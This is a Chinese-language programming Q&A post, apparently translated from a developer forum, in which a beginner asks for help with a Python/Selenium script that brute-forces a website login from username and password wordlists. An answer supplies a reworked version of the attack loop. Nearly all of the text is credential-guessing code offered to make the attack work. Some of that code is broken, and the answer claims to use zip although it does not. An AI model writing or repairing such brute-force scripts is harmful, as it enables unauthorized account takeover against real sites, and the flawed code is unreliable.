我是Python的新手,正在尝试使用Python和Selenium创建暴力脚本,以使用文本文件中的用户名和密码对网站进行暴力破解。我面临的问题是该脚本采用第一个用户名,并针对密码列表运行该用户名,然后停止。
我曾尝试在列表中进行迭代,嵌套循环,甚至使用手动提供的用户名调用该函数以进行测试,但逻辑仍然只选择第一个用户名,然后在到达密码列表末尾时,应用程序完成。
任何帮助将不胜感激。
user_list = open('usernamelist.txt' , 'r') #File containing usernames
pass_list = open('passwordlist.txt' , 'r') #File containing passwords
for usernm in user_list:
drv.get(target-website-url)
for passwd in pass_list:
username = drv.find_element_by_xpath("/html/body/div/ui-view/ui-view/div/div/div/div/div[3]/ui-view/div/form/div[1]/input")
username.send_keys(usernm.split())
password = drv.find_element_by_xpath("/html/body/div/ui-view/ui-view/div/div/div/div/div[3]/ui-view/div/form/div[2]/input")
password.send_keys(passwd.split())
submit = drv.find_element_by_xpath('//*[@id="loginButton"]')
submit.click()
time.sleep(1)
drv.refresh()
#To check for a successful or failed login using the current URL
login_fail = drv.current_url
if "redirect" in login_fail:
print("User" + usernm + " and " + passwd + " combo FAILED")
elif "dashboard" in login_fail:
print("User" + usernm + " and " + passwd + " combo SUCCEEDED")
drv.refresh()
time.sleep(2)
我建议使用zip函数,该函数从这两个列表中返回一个迭代器:
username = drv.find_element_by_xpath('/html/body/div/ui-view/uiview/div/div/div/div/div[3]/ui-view/div/form/div[1]/input')
password = drv.find_element_by_xpath('/html/body/div/ui-view/ui-view/div/div/div/div/div[3]/ui-view/div/form/div[2]/input')
for user user_list:
for passw in pass_list:
username.send_keys(user.strip()) # .strip() for removing \r and \n
password.send_keys(passw.strip()) # .strip() for removing \r and \n
submit = drv.find_element_by_xpath('//*[@id="loginButton"]')
submit.click()
time.sleep(2)
login_fail = drv.find_element_by_class_name("appInfoBox__header")
login_failure = (login_fail.get_attribute("innerHTML"))
if "Login error" in login_failure:
print("{user} and {passw} combo FAILED").format(
user = user,
passw = passw
)
else:
print("{user} and {passw} combo SUCCEEDED").format(
user = user,
passw = passw
)
drv.refresh()
time.sleep(2)
因为在您的情况下,代码遍历所有用户名,然后将它们发送到指定的元素,然后遍历密码,然后将它们发送到另一元素,所以它显示为一行:
for usernm in user_list:
username = drv.find_element_by_xpath('xpath')
username.send_keys(usernm)
for passwd in pass_list:
password = drv.find_element_by_xpath('xpath')
password.send_keys(passwd)